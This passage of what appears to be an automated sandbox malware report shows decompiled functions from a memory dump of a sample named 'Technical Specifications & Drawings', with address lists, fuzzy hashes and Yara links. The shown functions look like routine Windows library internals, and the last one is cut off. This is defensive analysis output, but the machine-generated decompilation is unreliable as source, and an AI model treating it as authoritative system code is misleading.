                                                  0x018706a9
                                                  0x018706b8
                                                  0x018706d6
                                                  0x018706d6
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `
                                                  • API String ID: 0-2679148245
                                                  • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                  • Instruction ID: 941d4f242ee1399ef3401c2b0eaf3c48a1d8dcafa5acbacea55ff4d3b9249923
                                                  • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                  • Instruction Fuzzy Hash: 2431E47260434A6BE710DE28CD85F97BBD9EBC5754F144229FA54EB280D770EA04CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01823884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E01823884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E017E9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L017C4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E017E9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                  0x01823893
                                                  0x01823896
                                                  0x01823899
                                                  0x0182389f
                                                  0x018238a0
                                                  0x018238a4
                                                  0x018238a9
                                                  0x018238ac
                                                  0x018238ad
                                                  0x018238ae
                                                  0x018238af
                                                  0x018238b1
                                                  0x018238b4
                                                  0x018238bb
                                                  0x018238bc
                                                  0x018238bd
                                                  0x018238c4
                                                  0x018238c8
                                                  0x018238ca
                                                  0x018238ca
                                                  0x018238d5
                                                  0x0182393e
                                                  0x01823940
                                                  0x01823942
                                                  0x01823952
                                                  0x01823954
                                                  0x01823961
                                                  0x01823961
                                                  0x01823967
                                                  0x0182396e
                                                  0x0182396e
                                                  0x01823947
                                                  0x0182394c
                                                  0x00000000
                                                  0x0182394c
                                                  0x018238ea
                                                  0x018238ee
                                                  0x018238f8
                                                  0x018238f9
                                                  0x018238ff
                                                  0x01823900
                                                  0x01823902
                                                  0x01823903
                                                  0x0182390b
                                                  0x0182390f
                                                  0x01823950
                                                  0x00000000
                                                  0x01823950
                                                  0x01823915
                                                  0x0182391d
                                                  0x0182391d
                                                  0x01823922
                                                  0x01823926
                                                  0x00000000
                                                  0x01823928
                                                  0x0182392b
                                                  0x0182392b
                                                  0x01823935
                                                  0x01823937
                                                  0x01823937
                                                  0x00000000
                                                  0x01823935
                                                  0x01823926
                                                  0x018238f0
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryName
                                                  • API String ID: 0-215506332
                                                  • Opcode ID: 4d96ae4c3f6554297da9ea31e5a8273b1629eafa91d33c0936581bb79cb07b4f
                                                  • Instruction ID: b451cf941f63bd8dad3c1e4a7a05a8f0148d930d5bd2b4dc68d66adfdfd9c67f
                                                  • Opcode Fuzzy Hash: 4d96ae4c3f6554297da9ea31e5a8273b1629eafa91d33c0936581bb79cb07b4f
                                                  • Instruction Fuzzy Hash: 9D310872A0052ABFDB16DA58C955D7BF7B4FB4AB20F014129ED04E7241D7349F40CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017DD294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 33%
                                                  			E017DD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x189d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E017C4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E017EB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E017E98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E017E95D0();
					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                  0x017dd29c
                                                  0x017dd2a6
                                                  0x017dd2b1
                                                  0x017dd2b5
                                                  0x017dd2b6
                                                  0x017dd2bc
                                                  0x017dd2bd
                                                  0x017dd2be
                                                  0x017dd2bf
                                                  0x017dd2c2
                                                  0x017dd2c4
                                                  0x017dd2cc
                                                  0x017dd384
                                                  0x017dd34b
                                                  0x017dd34f
                                                  0x017dd350
                                                  0x017dd351
                                                  0x017dd35c
                                                  0x017dd35c
                                                  0x017dd2d6
                                                  0x017dd2da
                                                  0x017dd2e1
                                                  0x017dd361
                                                  0x017dd369
                                                  0x017dd36d
                                                  0x017dd2e3
                                                  0x017dd2e3
                                                  0x017dd2e3
                                                  0x017dd2e5
                                                  0x017dd2ed
                                                  0x017dd2f5
                                                  0x017dd2fa
                                                  0x017dd302
                                                  0x017dd303
                                                  0x017dd30b
                                                  0x017dd30f
                                                  0x017dd313
                                                  0x017dd318
                                                  0x017dd31c
                                                  0x017dd320
                                                  0x017dd379
                                                  0x017dd37d
                                                  0x00000000
                                                  0x00000000
                                                  0x0181affe
                                                  0x0181b001
                                                  0x0181b011
                                                  0x00000000
                                                  0x017dd322
                                                  0x017dd322
                                                  0x017dd330
                                                  0x017dd337
                                                  0x017dd35d
                                                  0x017dd339
                                                  0x017dd33f
                                                  0x017dd38c
                                                  0x017dd38c
                                                  0x017dd33f
                                                  0x017dd349
                                                  0x00000000
                                                  0x017dd349

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: c1dcc62d6337c57248563ae3acb777ea3408521d82d8b92b197b04e6e96c677e
                                                  • Instruction ID: 8889d0720fbd45151f6c55a0c3ac8631bd64ed1999f8798abd504b8b0f0bdde8
                                                  • Opcode Fuzzy Hash: c1dcc62d6337c57248563ae3acb777ea3408521d82d8b92b197b04e6e96c677e
                                                  • Instruction Fuzzy Hash: C23193B2508309DFC721DF68C98495BFBF8EB99754F40092EF99583290DA34DD04CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017B1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E017B1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E017EBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E017EA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E017EA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L017C4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                  0x017b1b8f
                                                  0x017b1b9a
                                                  0x017b1b9c
                                                  0x017b1b9e
                                                  0x017b1ba3
                                                  0x01807010
                                                  0x01807010
                                                  0x00000000
                                                  0x017b1ba9
                                                  0x017b1ba9
                                                  0x017b1bae
                                                  0x00000000
                                                  0x017b1bc5
                                                  0x017b1bca
                                                  0x017b1bcf
                                                  0x017b1bd0
                                                  0x017b1bd1
                                                  0x017b1bd2
                                                  0x017b1bd6
                                                  0x017b1bdc
                                                  0x017b1be0
                                                  0x01806ffc
                                                  0x01807000
                                                  0x00000000
                                                  0x01807006
                                                  0x01807009
                                                  0x01807009
                                                  0x017b1be6
                                                  0x017b1bec
                                                  0x017b1c0b
                                                  0x017b1c0b
                                                  0x017b1c0c
                                                  0x017b1c11
                                                  0x017b1c12
                                                  0x017b1c15
                                                  0x017b1c1b
                                                  0x017b1c1f
                                                  0x017b1c31
                                                  0x017b1c33
                                                  0x01807026
                                                  0x01807026
                                                  0x017b1c21
                                                  0x017b1c24
                                                  0x017b1c24
                                                  0x017b1bee
                                                  0x017b1bee
                                                  0x017b1bf2
                                                  0x017b1c3a
                                                  0x017b1bf4
                                                  0x017b1bf4
                                                  0x017b1c05
                                                  0x017b1c05
                                                  0x017b1c09
                                                  0x017b1c3e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017b1c09
                                                  0x017b1bec
                                                  0x017b1be0
                                                  0x017b1bae
                                                  0x017b1c2e

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: WindowsExcludedProcs
                                                  • API String ID: 0-3583428290
                                                  • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                  • Instruction ID: e6540ec97a217056d716bfd7644759fd354f0b692b6a0e81a69c006a977b184f
                                                  • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                  • Instruction Fuzzy Hash: 2A21F53A501229EBDB22DA59A894F9BFBADAF44B50F064465FA04DB204D730DD0097E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017CF716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017CF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                  0x017cf71d
                                                  0x017cf722
                                                  0x017cf726
                                                  0x01814770
                                                  0x017cf765
                                                  0x017cf769
                                                  0x017cf769
                                                  0x017cf732
                                                  0x0181477a
                                                  0x00000000
                                                  0x0181477a
                                                  0x017cf738
                                                  0x017cf73a
                                                  0x017cf73c
                                                  0x017cf73f
                                                  0x017cf746
                                                  0x017cf778
                                                  0x017cf7a9
                                                  0x017cf7a9
                                                  0x017cf754
                                                  0x017cf75a
                                                  0x017cf75d
                                                  0x017cf75f
                                                  0x017cf761
                                                  0x017cf76f
                                                  0x017cf771
                                                  0x017cf771
                                                  0x017cf76f
                                                  0x017cf763
                                                  0x00000000
                                                  0x017cf763
                                                  0x017cf77d
                                                  0x017cf7a3
                                                  0x017cf7a5
                                                  0x00000000
                                                  0x017cf7a5
                                                  0x017cf77f
                                                  0x017cf782
                                                  0x017cf784
                                                  0x017cf786
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017cf788
                                                  0x017cf748
                                                  0x017cf74d
                                                  0x017cf78d
                                                  0x017cf793
                                                  0x017cf7b7
                                                  0x017cf7bc
                                                  0x00000000
                                                  0x017cf7bc
                                                  0x017cf798
                                                  0x00000000
                                                  0x00000000
                                                  0x017cf79d
                                                  0x017cf7b0
                                                  0x00000000
                                                  0x017cf7b0
                                                  0x017cf79f
                                                  0x00000000
                                                  0x017cf74f
                                                  0x017cf74f
                                                  0x00000000
                                                  0x017cf74f

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Actx
                                                  • API String ID: 0-89312691
                                                  • Opcode ID: 4d737f819d85ed918fa636847063e6560b0e8a056d2b3ca4160f6307a6dbb73f
                                                  • Instruction ID: a10cd916f357f2f37276aca4c6398d5ab7d055f9061b7a2f99cb0181727621ee
                                                  • Opcode Fuzzy Hash: 4d737f819d85ed918fa636847063e6560b0e8a056d2b3ca4160f6307a6dbb73f
                                                  • Instruction Fuzzy Hash: D211B2353057028BEB254F1D8490736F69BEB95F24FB4457EE961CB791DB70C8418341
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01858DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 71%
                                                  			E01858DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1880d50);
				E017FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01835720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = E017FDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				E017FDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E017FD130(_t34, _t39, _t40);
			}





                                                  0x01858df1
                                                  0x01858df1
                                                  0x01858df1
                                                  0x01858df1
                                                  0x01858df1
                                                  0x01858df1
                                                  0x01858df3
                                                  0x01858df8
                                                  0x01858dfd
                                                  0x01858e00
                                                  0x01858e0e
                                                  0x01858e2a
                                                  0x01858e36
                                                  0x01858e38
                                                  0x01858e3c
                                                  0x01858e46
                                                  0x01858e46
                                                  0x01858e36
                                                  0x01858e50
                                                  0x01858e56
                                                  0x01858e59
                                                  0x01858e5c
                                                  0x01858e60
                                                  0x01858e67
                                                  0x01858e6d
                                                  0x01858e73
                                                  0x01858e74
                                                  0x01858eb1
                                                  0x01858ebd

                                                  Strings
                                                  • Critical error detected %lx, xrefs: 01858E21
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Critical error detected %lx
                                                  • API String ID: 0-802127002
                                                  • Opcode ID: 5b0da801c428f974a7de65e1a4726a93a3ddfe196c843f10c0e3232e6c50509f
                                                  • Instruction ID: 7817ce54be792944f44e9d106fc13819fc474aa749d1465b12a9e690f57d83f4
                                                  • Opcode Fuzzy Hash: 5b0da801c428f974a7de65e1a4726a93a3ddfe196c843f10c0e3232e6c50509f
                                                  • Instruction Fuzzy Hash: 5F117975D04348DADF25DFA9C5057DDBBB0EB05314F20421ED529AB392C3340601DF14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01875BA5 Relevance: .6, Instructions: 592COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E01875BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1881178);
				E017FD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01874C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E017ED000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01875542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x18960e8;
								if( *0x18960e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x18960e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E017E9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
